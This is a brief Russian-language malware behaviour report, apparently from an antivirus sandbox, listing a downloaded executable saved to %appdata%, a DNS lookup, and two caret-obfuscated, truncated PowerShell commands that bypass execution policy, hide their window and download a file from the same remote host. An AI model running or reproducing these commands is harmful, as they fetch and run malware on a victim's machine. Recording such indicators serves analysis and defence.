Техническая информация
- http://wodkwkkwiiej81.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^We^RShE^LL^.^exE ^-eXECuT^ionPO^LIcy BY^Pass -nopRof^il^e -w^i^NDOWStyLe^ h^IddE^n (nEw-ObJe^Ct S^YSTE^M.nET.Webc^Li^E^Nt).Do^w^n^lo^adF^iLe('http://wodkwkkwiiej81.com/ttt/2002...
- DNS ASK wo####kwiiej81.com
- '<SYSTEM32>\cmd.exe' /C "pO^We^RShE^LL^.^exE ^-eXECuT^ionPO^LIcy BY^Pass -nopRof^il^e -w^i^NDOWStyLe^ h^IddE^n (nEw-ObJe^Ct S^YSTE^M.nET.Webc^Li^E^Nt).Do^w^n^lo^adF^iLe('http://wodkwkkwiiej81.com/ttt/2002...' (со скрытым окном)